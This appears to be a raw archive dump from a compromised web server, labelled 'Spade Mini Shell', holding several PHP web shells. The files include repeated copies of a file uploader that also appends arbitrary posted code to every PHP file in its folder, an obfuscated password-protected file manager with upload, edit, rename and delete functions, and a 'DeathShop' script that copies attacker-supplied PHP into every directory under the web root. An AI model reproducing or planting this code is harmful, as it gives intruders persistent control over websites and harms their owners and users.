Spade
Mini Shell
qpyufacb.php000064400000001370151166777720007113 0ustar00<?php
echo"<form method='post'
enctype='multipart/form-data'><input type='file'
name='a'><input type='submit'
value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file,
'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>
nrvts5.php000064400000000000151166777720006527
0ustar00wbc80.php000064400000000016151166777720006220 0ustar00404: Not
Foundssb4zz.php000064400000000000151166777720006525
0ustar00x0slb.php000064400000000016151166777720006325 0ustar00404: Not
Foundw4ad6z.php000064400000000000151166777720006405
0ustar00muhuc.php000064400000000016151166777720006416 0ustar00404: Not
Foundindec.php000064400000033211151166777720006362 0ustar00<?php goto
NLnKLsvYFH;
NLnKLsvYFH:
$password =
"\x30\x61\x39\x31\x65\x63\x37\x38\x61\x32\x63\x62\x38\x65\x38\x30\x38\x38\x39\x35\x62\x35\x61\x36\x30\x61\x64\x65\x36\x63\x31\x64";
error_reporting(0);
set_time_limit(0);
session_start();
if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"]))
{#loggedokm
goto DqqOhzX5B0;
}
goto u3NT7x2QrJ;
u3NT7x2QrJ:
$_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false;
DqqOhzX5B0:
if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) {
#password
goto pb73Ufbn0o;
}
if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) ==
$password)) {
goto mr5E2rLws5;
}
$_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5(
$_POST["\160\141\x73\163\x77\x6f\x72\x64"]
);
goto SjaSVtI46I;
SjaSVtI46I:
mr5E2rLws5:
pb73Ufbn0o:
if (
!(
!$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] ||
$_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] !=
$password
)
) {
goto EXNN3Tp2rS;
}
echo
"\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x20\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa";
exit();
goto ocC9gxzse4;
ocC9gxzse4:
EXNN3Tp2rS:
?> <!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8"> <meta
http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,
initial-scale=1.0"> <title>000</title> <link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"
crossorigin="anonymous"> <link
rel="stylesheet"
href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
crossorigin="anonymous"
referrerpolicy="no-referrer" /></head><body>
<?php
function formatSizeUnits($bytes)
{
if ($bytes >= 1073741824) {
$bytes = number_format($bytes / 1073741824, 2) . "
GB";
} elseif ($bytes >= 1048576) {
$bytes = number_format($bytes / 1048576, 2) . " MB";
} elseif ($bytes >= 1024) {
$bytes = number_format($bytes / 1024, 2) . " KB";
} elseif ($bytes > 1) {
$bytes = $bytes . " bytes";
} elseif ($bytes == 1) {
$bytes = $bytes . " byte";
} else {
$bytes = "0 bytes";
}
return $bytes;
}
function fileExtension($file)
{
return substr(strrchr($file, "."), 1);
}
function fileIcon($file)
{
$imgs = [
"apng",
"avif",
"gif",
"jpg",
"jpeg",
"jfif",
"pjpeg",
"pjp",
"png",
"svg",
"webp",
];
$audio = ["wav", "m4a", "m4b",
"mp3", "ogg", "webm", "mpc"];
$ext = strtolower(fileExtension($file));
if ($file == "error_log") {
return '<i class="fa-sharp fa-solid
fa-bug"></i> ';
} elseif ($file == ".htaccess") {
return '<i class="fa-solid
fa-hammer"></i> ';
}
if ($ext == "html" || $ext == "htm") {
return '<i class="fa-brands
fa-html5"></i> ';
} elseif ($ext == "php" || $ext == "phtml") {
return '<i class="fa-brands
fa-php"></i> ';
} elseif (in_array($ext, $imgs)) {
return '<i class="fa-regular
fa-images"></i> ';
} elseif ($ext == "css") {
return '<i class="fa-brands
fa-css3"></i> ';
} elseif ($ext == "txt") {
return '<i class="fa-regular
fa-file-lines"></i> ';
} elseif (in_array($ext, $audio)) {
return '<i class="fa-duotone
fa-file-music"></i> ';
} elseif ($ext == "py") {
return '<i class="fa-brands
fa-python"></i> ';
} elseif ($ext == "js") {
return '<i class="fa-brands
fa-js"></i> ';
} else {
return '<i class="fa-solid
fa-file"></i> ';
}
}
function encodePath($path)
{
$a = ["/", "\\", ".", ":"];
$b = ["ক", "খ", "গ",
"ঘ"];
return str_replace($a, $b, $path);
}
function decodePath($path)
{
$a = ["/", "\\", ".", ":"];
$b = ["ক", "খ", "গ",
"ঘ"];
return str_replace($b, $a, $path);
}
$root_path = __DIR__;
if (isset($_GET["p"])) {
if (empty($_GET["p"])) {
$p = $root_path;
} elseif (!is_dir(decodePath($_GET["p"]))) {
echo "<script>\nalert('Directory is Corrupted
and
Unreadable.');\nwindow.location.replace('?');\n</script>";
} elseif (is_dir(decodePath($_GET["p"]))) {
$p = decodePath($_GET["p"]);
}
} elseif (isset($_GET["q"])) {
if (!is_dir(decodePath($_GET["q"]))) {
echo
"<script>window.location.replace('?p=');</script>";
} elseif (is_dir(decodePath($_GET["q"]))) {
$p = decodePath($_GET["q"]);
}
} else {
$p = $root_path;
}
define("PATH", $p);
echo '<nav class="navbar navbar-light"
style="background-color: #fdcdf9;"> <div
class="navbar-brand"> <a href="?"><img
src="https://github.com/fluidicon.png" width="30"
height="30" alt=""></a>';
$path = str_replace("\\", "/", PATH);
$paths = explode("/", $path);
foreach ($paths as $id => $dir_part) {
if ($dir_part == "" && $id == 0) {
$a = true;
echo "<a href=\"?p=/\">/</a>";
continue;
}
if ($dir_part == "") {
continue;
}
echo "<a href='?p=";
for ($i = 0; $i <= $id; $i++) {
echo str_replace(":", "ঘ", $paths[$i]);
if ($i != $id) {
echo "ক";
}
}
echo "'>" . $dir_part . "</a>/";
}
echo '</div><div class="form-inline"><a
href="?upload&q=' .
urlencode(encodePath(PATH)) .
'"><button class="btn btn-dark"
type="button">Upload File</button></a><a
href="?"><button type="button" class="btn
btn-dark">HOME</button></a>
</div></nav>';
if (isset($_GET["p"])) {
if (is_readable(PATH)) {
$fetch_obj = scandir(PATH);
$folders = [];
$files = [];
foreach ($fetch_obj as $obj) {
if ($obj == "." || $obj == "..") {
continue;
}
$new_obj = PATH . "/" . $obj;
if (is_dir($new_obj)) {
array_push($folders, $obj);
} elseif (is_file($new_obj)) {
array_push($files, $obj);
}
}
}
echo '<table class="table table-hover">
<thead> <tr> <th
scope="col">Name</th> <th
scope="col">Size</th> <th
scope="col">Modified</th> <th
scope="col">Perms</th> <th
scope="col">Actions</th> </tr> </thead>
<tbody>';
foreach ($folders as $folder) {
echo " <tr> <td><i
class='fa-solid fa-folder'></i> <a
href='?p=" .
urlencode(encodePath(PATH . "/" . $folder)) .
"'>" .
$folder .
"</a></td>
<td><b>---</b></td> <td>" .
date("F d Y H:i:s.", filemtime(PATH .
"/" . $folder)) .
"</td> <td>0" .
substr(decoct(fileperms(PATH . "/" . $folder)),
-3) .
"</a></td> <td> <a
title='Rename' href='?q=" .
urlencode(encodePath(PATH)) .
"&r=" .
$folder .
"'><i class='fa-sharp fa-regular
fa-pen-to-square'></i></a> <a
title='Delete' href='?q=" .
urlencode(encodePath(PATH)) .
"&d=" .
$folder .
"'><i class='fa fa-trash'
aria-hidden='true'></i></a> <td>
</tr>";
}
foreach ($files as $file) {
echo " <tr> <td>" .
fileIcon($file) .
$file .
"</td> <td>" .
formatSizeUnits(filesize(PATH . "/" . $file)) .
"</td> <td>" .
date("F d Y H:i:s.", filemtime(PATH .
"/" . $file)) .
"</td> <td>0" .
substr(decoct(fileperms(PATH . "/" . $file)), -3)
.
"</a></td> <td>
<a title='Edit File' href='?q=" .
urlencode(encodePath(PATH)) .
"&e=" .
$file .
"'><i class='fa-solid
fa-file-pen'></i></a> <a
title='Rename' href='?q=" .
urlencode(encodePath(PATH)) .
"&r=" .
$file .
"'><i class='fa-sharp fa-regular
fa-pen-to-square'></i></a> <a
title='Delete' href='?q=" .
urlencode(encodePath(PATH)) .
"&d=" .
$file .
"'><i class='fa fa-trash'
aria-hidden='true'></i></a> <td>
</tr>";
}
echo " </tbody></table>";
} else {
if (empty($_GET)) {
echo
"<script>window.location.replace('?p=');</script>";
}
}
if (isset($_GET["upload"])) {
echo ' <form method="post"
enctype="multipart/form-data"> Select file to upload:
<input type="file" name="fileToUpload"
id="fileToUpload"> <input type="submit"
class="btn btn-dark" value="Upload"
name="upload"> </form>';
}
if (isset($_GET["r"])) {
if (!empty($_GET["r"]) &&
isset($_GET["q"])) {
echo ' <form method="post">
Rename: <input type="text" name="name"
value="' .
$_GET["r"] .
'"> <input type="submit"
class="btn btn-dark" value="Rename"
name="rename"> </form>';
if (isset($_POST["rename"])) {
$name = PATH . "/" . $_GET["r"];
if (rename($name, PATH . "/" .
$_POST["name"])) {
echo "<script>alert('Renamed.');
window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
} else {
echo "<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
}
}
}
}
if (isset($_GET["e"])) {
if (!empty($_GET["e"]) &&
isset($_GET["q"])) {
echo ' <form method="post">
<textarea style="height: 500px; width: 90%;"
name="data">' .
htmlspecialchars(file_get_contents(PATH . "/" .
$_GET["e"])) .
'</textarea> <br> <input
type="submit" class="btn btn-dark"
value="Save" name="edit"> </form>';
if (isset($_POST["edit"])) {
$filename = PATH . "/" . $_GET["e"];
$data = $_POST["data"];
$open = fopen($filename, "w");
if (fwrite($open, $data)) {
echo "<script>alert('Saved.');
window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
} else {
echo "<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
}
fclose($open);
}
}
}
if (isset($_POST["upload"])) {
$target_file = PATH . "/" .
$_FILES["fileToUpload"]["name"];
if (
move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$target_file)
) {
echo "<p>" .
htmlspecialchars(basename($_FILES["fileToUpload"]["name"]))
.
" has been uploaded.</p>";
} else {
echo "<p>Sorry, there was an error uploading your
file.</p>";
}
}
if (isset($_GET["d"]) && isset($_GET["q"]))
{
$name = PATH . "/" . $_GET["d"];
if (is_file($name)) {
if (unlink($name)) {
echo "<script>alert('File removed.');
window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
} else {
echo "<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
}
} elseif (is_dir($name)) {
if (rmdir($name) == true) {
echo "<script>alert('Directory
removed.'); window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
} else {
echo "<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) .
"');</script>";
}
}
}
?> <script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
crossorigin="anonymous"></script></body></html>y.php000064400000005552151166777720005557
0ustar00<?php
function generateRandomString($length) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$charLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charLength - 1)];
}
return $randomString;
}
function method1() {
$currentPath = dirname($_SERVER['DOCUMENT_ROOT']);
if ($currentPath === false) {
echo "Unable to determine the current path.";
return;
}
$contents = scandir($currentPath);
if ($contents === false) {
echo "Unable to list the contents of the current path.";
return;
}
echo json_encode($contents);
}
function method2() {
$currentPath = $_SERVER['DOCUMENT_ROOT'];
if ($currentPath === false) {
echo "Unable to determine the current path.";
return;
}
$contents = scandir($currentPath);
if ($contents === false) {
echo "Unable to list the contents of the current path.";
return;
}
echo json_encode($contents);
}
if (isset($_GET['met1'])) {
method1();
} else if (isset($_GET['met2'])) {
method2();
} else if (isset($_GET['actmet1'])) {
$sc = $_POST['file'];
$nama = generateRandomString(8);
$filePath = $nama . '.php';
$dead = fopen($filePath, "w");
if ($dead === false) {
echo "Failed to open the file for writing.";
} else {
if (fwrite($dead, $sc) === false) {
echo "Failed to write to the file.";
} else {
fclose($dead);
$currentPath = dirname($_SERVER['DOCUMENT_ROOT']);
$contents = scandir($currentPath);
foreach ($contents as $a) {
$newpath = $currentPath . '/' . $a .
'/' . $nama . '.php';
$badman = @copy($filePath, $newpath);
if ($badman) {
echo $a . '/' . $nama . '.php' .
'|';
}
}
}
}
} else if (isset($_GET['actmet2'])) {
$sc = $_POST['file'];
$nama = generateRandomString(8);
$filePath = $nama . '.php';
$dead = fopen($filePath, "w");
if ($dead === false) {
echo "Failed to open the file for writing.";
} else {
if (fwrite($dead, $sc) === false) {
echo "Failed to write to the file.";
} else {
fclose($dead);
$currentPath = $_SERVER['DOCUMENT_ROOT'];
$contents = scandir($currentPath);
foreach ($contents as $a) {
$newpath = $currentPath . '/' . $a .
'/' . $nama . '.php';
$badman = @copy($filePath, $newpath);
if ($badman) {
echo $a . '/' . $nama . '.php' .
'|';
}
}
}
}
} else {
echo 'DeathShop';
}
?>ratcsegm.php000064400000001370151166777720007106 0ustar00<?php
echo"<form method='post'
enctype='multipart/form-data'><input type='file'
name='a'><input type='submit'
value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file,
'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>
erfinejd.php000064400000001370151166777720007067 0ustar00<?php
echo"<form method='post'
enctype='multipart/form-data'><input type='file'
name='a'><input type='submit'
value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file,
'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>